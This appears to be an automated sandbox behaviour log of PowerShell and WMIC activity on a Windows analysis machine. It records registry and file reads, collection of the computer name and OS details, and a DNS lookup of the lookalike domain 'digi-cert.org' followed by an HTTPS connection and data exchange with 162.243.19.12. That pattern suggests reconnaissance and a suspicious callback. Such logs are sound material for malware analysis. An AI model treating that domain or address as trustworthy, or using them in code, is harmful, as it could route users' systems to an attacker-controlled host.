Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\Nd9E1FYi	1	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 972	1	Fn Data
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	5	Fn Data
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	type = file_type	1	Fn
File	Read	size = 4096, size_out = 4096	1	Fn Data
File	Read	size = 4096, size_out = 978	1	Fn Data
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 214	1	Fn Data
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	2	Fn Data
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	1	Fn Data
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	1	Fn Data
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096	1	Fn Data
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096	1	Fn Data
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes	3	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\Nd9E1FYi	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\PowerShell_profile.ps1, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
System	Get Time	type = Ticks, time = 140265	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn

Thread 0xe6c

Category	Operation	Information	Count	Logfile
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	2	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	2	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	2	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x13c

Category	Operation	Information	Success	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace		12	Fn

Thread 0xa44

419

639

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	9	Fn
Module	Get Filename	process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\System32\Wbem\WMIC.exe, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes	2	Fn
File	Create	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type	2	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459	1	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 0	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\System32\Wbem\WMIC.exe, size = 260	1	Fn
File	Get Info	filename = C:\Windows\System32\Wbem\WMIC.config, type = file_attributes	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
System	Get Computer Name	result_out = X2VS1CUM	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = %systemroot%\system32\netfxperf.dll, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 6000, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY	2	Fn Data
Module	Create Mapping	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072	1	Fn
Module	Map	process_name = c:\windows\system32\wbem\wmic.exe, desired_access = FILE_MAP_WRITE	1	Fn
System	Get Info	type = Operating System	2	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Open	mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework, value_name = LegacyWPADSupport, type = REG_NONE	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = digi-cert.org, address_out = 162.243.19.12	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727, value_name = SchUseStrongCrypto, type = REG_NONE	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 125, size_out = 125	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 61, size_out = 61	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1575, size_out = 1575	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 331, size_out = 331	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4, size_out = 4	1	Fn Data
Socket	Send	flags = NO_FLAG_SET, size = 134, size_out = 134	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 218, size_out = 218	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 245, size_out = 245	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 336, size_out = 336	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5504, size_out = 5504	1	Fn Data
Environment	Get Environment String	name = MshEnableTrace	3	Fn
System	Get Info	type = Operating System	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 245, size_out = 245	1	Fn Data
Socket	Send	flags = NO_FLAG_SET, size = 501, size_out = 501	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 528, size_out = 528	1	Fn Data
System	Get Computer Name	result_out = X2VS1CUM	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
Module	Load	module_name = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\\wminet_utils.dll, base_address = 0x7ffbf68f0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = ResetSecurity, address_out = 0x7ffbf68f20e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = SetSecurity, address_out = 0x7ffbf68f21b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = BlessIWbemServices, address_out = 0x7ffbf68f2290	1	Fn
Module	Get Address	module_name = Unknown module name, function = BlessIWbemServicesObject, address_out = 0x7ffbf68f23b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetPropertyHandle, address_out = 0x7ffbf68f24d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = WritePropertyValue, address_out = 0x7ffbf68f2500	1	Fn
Module	Get Address	module_name = Unknown module name, function = Clone, address_out = 0x7ffbf68f2530	1	Fn
Module	Get Address	module_name = Unknown module name, function = VerifyClientKey, address_out = 0x7ffbf68f31f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetQualifierSet, address_out = 0x7ffbf68f2a50	1	Fn
Module	Get Address	module_name = Unknown module name, function = Get, address_out = 0x7ffbf68f2700	1	Fn
Module	Get Address	module_name = Unknown module name, function = Put, address_out = 0x7ffbf68f26c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = Delete, address_out = 0x7ffbf68f2750	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetNames, address_out = 0x7ffbf68f2760	1	Fn
Module	Get Address	module_name = Unknown module name, function = BeginEnumeration, address_out = 0x7ffbf68f27b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = Next, address_out = 0x7ffbf68f27c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = EndEnumeration, address_out = 0x7ffbf68f2810	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetPropertyQualifierSet, address_out = 0x7ffbf68f2820	1	Fn
Module	Get Address	module_name = Unknown module name, function = Clone, address_out = 0x7ffbf68f2530	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetObjectText, address_out = 0x7ffbf68f2840	1	Fn
Module	Get Address	module_name = Unknown module name, function = SpawnDerivedClass, address_out = 0x7ffbf68f2860	1	Fn
Module	Get Address	module_name = Unknown module name, function = SpawnInstance, address_out = 0x7ffbf68f2880	1	Fn
Module	Get Address	module_name = Unknown module name, function = CompareTo, address_out = 0x7ffbf68f28a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetPropertyOrigin, address_out = 0x7ffbf68f28c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = InheritsFrom, address_out = 0x7ffbf68f28e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetMethod, address_out = 0x7ffbf68f28f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = PutMethod, address_out = 0x7ffbf68f2940	1	Fn
Module	Get Address	module_name = Unknown module name, function = DeleteMethod, address_out = 0x7ffbf68f2990	1	Fn
Module	Get Address	module_name = Unknown module name, function = BeginMethodEnumeration, address_out = 0x7ffbf68f29a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = NextMethod, address_out = 0x7ffbf68f29b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = EndMethodEnumeration, address_out = 0x7ffbf68f2a00	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetMethodQualifierSet, address_out = 0x7ffbf68f2a10	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetMethodOrigin, address_out = 0x7ffbf68f2a30	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_Get, address_out = 0x7ffbf68f2a60	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_Put, address_out = 0x7ffbf68f2ab0	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_Delete, address_out = 0x7ffbf68f2ae0	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_GetNames, address_out = 0x7ffbf68f2af0	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_BeginEnumeration, address_out = 0x7ffbf68f2b10	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_Next, address_out = 0x7ffbf68f2b20	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_EndEnumeration, address_out = 0x7ffbf68f2b70	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetCurrentApartmentType, address_out = 0x7ffbf68f2a50	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetDemultiplexedStub, address_out = 0x7ffbf68f2060	1	Fn
Module	Get Address	module_name = Unknown module name, function = CreateInstanceEnumWmi, address_out = 0x7ffbf68f1760	1	Fn
Module	Get Address	module_name = Unknown module name, function = CreateClassEnumWmi, address_out = 0x7ffbf68f18c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = ExecQueryWmi, address_out = 0x7ffbf68f1a20	1	Fn
Module	Get Address	module_name = Unknown module name, function = ExecNotificationQueryWmi, address_out = 0x7ffbf68f1b90	1	Fn
Module	Get Address	module_name = Unknown module name, function = PutInstanceWmi, address_out = 0x7ffbf68f1d00	1	Fn
Module	Get Address	module_name = Unknown module name, function = PutClassWmi, address_out = 0x7ffbf68f1e00	1	Fn
Module	Get Address	module_name = Unknown module name, function = CloneEnumWbemClassObject, address_out = 0x7ffbf68f1f00	1	Fn
Module	Get Address	module_name = Unknown module name, function = ConnectServerWmi, address_out = 0x7ffbf68f34c0	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	2	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
